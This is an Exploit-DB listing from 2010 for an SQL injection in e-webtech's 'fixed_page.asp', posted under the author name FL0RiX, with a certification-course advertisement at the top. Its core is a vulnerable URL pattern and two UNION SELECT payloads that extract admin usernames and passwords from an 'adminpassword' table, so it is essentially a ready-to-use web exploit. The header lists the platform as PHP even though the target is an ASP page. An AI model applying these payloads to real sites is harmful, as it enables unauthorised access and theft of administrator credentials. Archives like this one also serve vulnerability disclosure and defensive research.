e-webtech - 'fixed_page.asp' SQL Injection

EDB-ID:

12583

CVE:

N/A


Author:

FL0RiX

Type:

webapps


Platform:

PHP

Date:

2010-05-12


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

####################################################
    e-webtech (fixed_page.asp) SQL Injection Vulnerability 
####################################################
# Author   : Fl0riX 
# 
# Name     : e-webtech
# 
# Bug Type   : SQL Injection 
# 
# Infection    : Admin login bilgileri alinabilir. 
# 
# Demo Vuln : 
# 
# http://[site]/fixed_page.asp?id=[SQL Inj.]
#
# User Exploit:null+union+all+select+1,username+from+adminpassword
# Password Exploit:null+union+all+select+1,pw+from+adminpassword
####################################################